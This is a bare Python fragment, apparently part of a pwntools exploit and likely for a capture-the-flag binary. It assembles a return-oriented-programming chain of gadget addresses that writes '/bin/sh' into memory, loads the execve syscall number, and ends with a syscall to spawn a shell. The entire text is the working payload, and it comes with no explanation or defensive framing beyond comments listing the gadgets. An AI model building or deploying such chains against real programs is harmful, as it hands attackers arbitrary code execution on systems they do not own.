payload = p64(0x40d8a9)
#0x000000000040d8a9: pop rdx; ret; 
payload += p64(0x661058)+p64(0x475977)
# 0x0000000000475977: pop rax; ret; 
payload += p64(0x68662f6e69622f)+p64(0x4cb8d8)
# 0x00000000004cb8d8: mov qword ptr [rdx], rax; ret; 
payload += p64(0x479768)
# 0x0000000000479768: xor edx, edx; xor eax, eax; ret; 
payload += p64(0x475977)
# 0x0000000000475977: pop rax; ret; 
payload += p64(0x3b)+p64(0x458ae0)
# 0x0000000000458ae0: pop rdi; ret; 
payload += p64(0x661058)+p64(0x40ceff)
# 0x000000000040ceff: pop rsi; ret; 
payload += p64(0x0)+p64(0x403474)
# 0x0000000000403474: syscall; 
payload += b''
